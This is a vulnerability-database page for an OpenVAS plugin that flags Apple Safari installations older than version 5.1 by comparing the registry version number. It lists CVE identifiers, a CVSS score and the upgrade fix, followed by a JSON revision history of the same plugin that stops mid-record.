Search...

Apple Safari Multiple Vulnerabilities - July 2011

2011-07-27T00:00:00

ID OPENVAS:1361412562310902543
Type openvas
Reporter Copyright (C) 2011 SecPod
Modified 2019-07-16T00:00:00

Description

The host is installed with Apple Safari web browser and is prone to multiple vulnerabilities.

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# Apple Safari Multiple Vulnerabilities - July 2011
#
# Authors:
# Sooraj KS &lt;kssooraj@secpod.com&gt;
#
# Copyright:
# Copyright (c) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.902543");
  script_version("2019-07-16T15:57:25+0000");
  script_tag(name:"last_modification", value:"2019-07-16 15:57:25 +0000 (Tue, 16 Jul 2019)");
  script_tag(name:"creation_date", value:"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)");
  script_cve_id("CVE-2010-1383", "CVE-2010-1420", "CVE-2011-0214", "CVE-2011-0215",
                "CVE-2011-0216", "CVE-2011-0217", "CVE-2011-0218", "CVE-2011-0219",
                "CVE-2011-0221", "CVE-2011-0222", "CVE-2011-0223", "CVE-2011-0225",
                "CVE-2011-0232", "CVE-2011-0233", "CVE-2011-0234", "CVE-2011-0235",
                "CVE-2011-0237", "CVE-2011-0238", "CVE-2011-0240", "CVE-2011-0241",
                "CVE-2011-0242", "CVE-2011-0244", "CVE-2011-0253", "CVE-2011-0254",
                "CVE-2011-0255", "CVE-2011-1288", "CVE-2011-1453", "CVE-2011-1457",
                "CVE-2011-1462", "CVE-2011-1774", "CVE-2011-1797", "CVE-2011-3443");
  script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,
                    48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,
                    48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,
                    48857, 48858, 48859, 51035);
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_name("Apple Safari Multiple Vulnerabilities - July 2011");
  script_xref(name:"URL", value:"http://support.apple.com/kb/HT4808");
  script_xref(name:"URL", value:"http://lists.apple.com/archives/security-announce/2011/Jul/msg00002.html");

  script_tag(name:"qod_type", value:"registry");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2011 SecPod");
  script_family("General");
  script_dependencies("secpod_apple_safari_detect_win_900003.nasl");
  script_mandatory_keys("AppleSafari/Version");

  script_tag(name:"impact", value:"Successful exploitation may result in information disclosure, remote code
  execution, denial of service, or other consequences.");

  script_tag(name:"affected", value:"Apple Safari versions prior to 5.1");

  script_tag(name:"insight", value:"Please see the references for more details about the vulnerabilities.");

  script_tag(name:"solution", value:"Upgrade to Apple Safari version 5.1 or later.");

  script_tag(name:"summary", value:"The host is installed with Apple Safari web browser and is prone
  to multiple vulnerabilities.");

  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("version_func.inc");

safVer = get_kb_item("AppleSafari/Version");
if(!safVer)
  exit(0);

if(version_is_less(version:safVer, test_version:"5.34.50.0")) {
  security_message( port: 0, data: "The target host was found to be vulnerable" );
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310902543", "bulletinFamily": "scanner", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "published": "2011-07-27T00:00:00", "modified": "2019-07-16T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "reporter": "Copyright (C) 2011 SecPod", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011/Jul/msg00002.html"], "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "type": "openvas", "lastseen": "2019-07-17T14:31:16", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "897bb553b884f4f4b2caf5d85911ecbee9bac93a8dd8ee3280f3f1117c3b8448", "hashmap": [{"hash": "834922d12c2c5621cba47517fe4dfc01", "key": "title"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "e3b49025dc785ac38bc3cb68e0b303aa", "key": "cvelist"}, {"hash": "47b7af37442829b528c09669b775ce82", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "4470ee42d3ccf970ceff91ef67a5caf0", "key": "references"}, {"hash": "1d642e54ded4d21a662dd27ff0bbf623", "key": "pluginID"}, {"hash": "9b79284313cbecfba7ee9daece275486", "key": "published"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "8b3416ddddfb6b12b0926d0c42fb23e1", "key": "reporter"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b4c2a4b2d0ef11340f06a32ba5a99466", "key": "description"}, {"hash": "4e28b7feca97a88515bab30ea46bd7a3", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "id": "OPENVAS:1361412562310902543", "lastseen": "2018-09-02T00:03:45", "modified": "2018-04-06T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310902543", "published": "2011-07-27T00:00:00", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html"], "reporter": "Copyright (C) 2011 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 9351 2018-04-06 07:05:43Z cfischer $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 9351 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:05:43 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.1 (5.34.50.0)\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message(0);\n}\n", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2018-09-02T00:03:45"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "897bb553b884f4f4b2caf5d85911ecbee9bac93a8dd8ee3280f3f1117c3b8448", "hashmap": [{"hash": "834922d12c2c5621cba47517fe4dfc01", "key": "title"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "e3b49025dc785ac38bc3cb68e0b303aa", "key": "cvelist"}, {"hash": "47b7af37442829b528c09669b775ce82", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "4470ee42d3ccf970ceff91ef67a5caf0", "key": "references"}, {"hash": "1d642e54ded4d21a662dd27ff0bbf623", "key": "pluginID"}, {"hash": "9b79284313cbecfba7ee9daece275486", "key": "published"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "8b3416ddddfb6b12b0926d0c42fb23e1", "key": "reporter"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b4c2a4b2d0ef11340f06a32ba5a99466", "key": "description"}, {"hash": "4e28b7feca97a88515bab30ea46bd7a3", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "id": "OPENVAS:1361412562310902543", "lastseen": "2018-04-06T11:35:12", "modified": "2018-04-06T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310902543", "published": "2011-07-27T00:00:00", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html"], "reporter": "Copyright (C) 2011 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 9351 2018-04-06 07:05:43Z cfischer $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 9351 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:05:43 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.1 (5.34.50.0)\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message(0);\n}\n", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2018-04-06T11:35:12"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "edition": 5, "enchantments": {"dependencies": {"modified": "2018-10-22T16:44:44", "references": [{"idList": ["SUSE-SU-2011:0857-1"], "type": "suse"}, {"idList": ["MSVR11-009"], "type": "msvr"}, {"idList": ["PACKETSTORM:105943"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:26756", "SECURITYVULNS:DOC:26757", "SECURITYVULNS:DOC:26759", "SECURITYVULNS:VULN:11974", "SECURITYVULNS:DOC:26667", "SECURITYVULNS:DOC:26668", "SECURITYVULNS:DOC:26666", "SECURITYVULNS:VULN:11798", "SECURITYVULNS:DOC:26755", "SECURITYVULNS:DOC:27156"], "type": "securityvulns"}, {"idList": ["RHSA-2012:0016"], "type": "redhat"}, {"idList": ["OPENVAS:70712", "OPENVAS:802233", "OPENVAS:831506", "OPENVAS:902543", "OPENVAS:1361412562310870530", "OPENVAS:881090", "OPENVAS:1361412562310802193", "OPENVAS:802193", "OPENVAS:1361412562310802233", "OPENVAS:1361412562310831506"], "type": "openvas"}, {"idList": ["CVE-2011-1462", "CVE-2011-0216", "CVE-2011-0241", "CVE-2011-0219", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2010-1383"], "type": "cve"}, {"idList": ["SAINT:93F870242C8D8DFE6FB0218061E2532F", "SAINT:92788531D3EC95DEA25C0A30FCD1E592", "SAINT:E8E10FFE061EB44A3ED40AD04B13EC24"], "type": "saint"}, {"idList": ["SSV:20761", "SSV:20769", "SSV:20751", "SSV:20762", "SSV:26024", "SSV:21013", "SSV:20768"], "type": "seebug"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/SAFARI_XSLT_OUTPUT", "MSF:AUXILIARY/SERVER/WEBKIT_XSLT_DROPPER"], "type": "metasploit"}, {"idList": ["SAFARI_5_1.NASL", "SL_20120111_LIBXML2_ON_SL4_X.NASL", "ITUNES_10_5_BANNER.NASL", "MACOSX_SAFARI5_1.NASL", "REDHAT-RHSA-2012-0016.NASL", "MANDRIVA_MDVSA-2011-188.NASL", "CENTOS_RHSA-2012-0016.NASL", "SUSE_11_LIBWEBKIT-110725.NASL", "ITUNES_10_5.NASL"], "type": "nessus"}, {"idList": ["ELSA-2012-0016"], "type": "oraclelinux"}, {"idList": ["1337DAY-ID-22651"], "type": "zdt"}, {"idList": ["DEBIAN:DSA-2394-1:72A72"], "type": "debian"}, {"idList": ["EDB-ID:17993"], "type": "exploitdb"}, {"idList": ["ZDI-11-239", "ZDI-11-240", "ZDI-11-140", "ZDI-11-243", "ZDI-11-242", "ZDI-11-138", "ZDI-11-241"], "type": "zdi"}, {"idList": ["CESA-2012:0016"], "type": "centos"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "a9e24d5ca4129f9f027947ab62e3637db8fec239d5d0c4847463ef6f56b8c0f8", "hashmap": [{"hash": "834922d12c2c5621cba47517fe4dfc01", "key": "title"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "e3b49025dc785ac38bc3cb68e0b303aa", "key": "cvelist"}, {"hash": "1d642e54ded4d21a662dd27ff0bbf623", "key": "pluginID"}, {"hash": "9b79284313cbecfba7ee9daece275486", "key": "published"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "18de6c9a8c4d88a597e323f96759a2f7", "key": "sourceData"}, {"hash": "8b3416ddddfb6b12b0926d0c42fb23e1", "key": "reporter"}, {"hash": "100df4c554f3a5e3dde24cf0713cff40", "key": "references"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b4c2a4b2d0ef11340f06a32ba5a99466", "key": "description"}, {"hash": "2c104a45bc8ee43625332611b190dc40", "key": "modified"}, {"hash": "4e28b7feca97a88515bab30ea46bd7a3", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "id": "OPENVAS:1361412562310902543", "lastseen": "2018-10-22T16:44:44", "modified": "2018-10-20T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310902543", "published": "2011-07-27T00:00:00", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html", "http://www.apple.com/safari/download/"], "reporter": "Copyright (C) 2011 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4808\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_mandatory_keys(\"AppleSafari/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\");\n script_tag(name:\"affected\", value:\"Apple Safari versions prior to 5.1\");\n script_tag(name:\"insight\", value:\"For more details about the vulnerabilities refer the reference section.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari version 5.1 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.apple.com/safari/download/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "viewCount": 2}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-10-22T16:44:44"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-05-29T18:39:44", "references": [{"idList": ["SUSE-SU-2011:0857-1"], "type": "suse"}, {"idList": ["DEBIAN_DSA-2394.NASL", "SAFARI_5_1.NASL", "UBUNTU_USN-1334-1.NASL", "ITUNES_10_5_BANNER.NASL", "MACOSX_SAFARI5_1.NASL", "MANDRIVA_MDVSA-2011-188.NASL", "SUSE_11_LIBWEBKIT-110725.NASL", 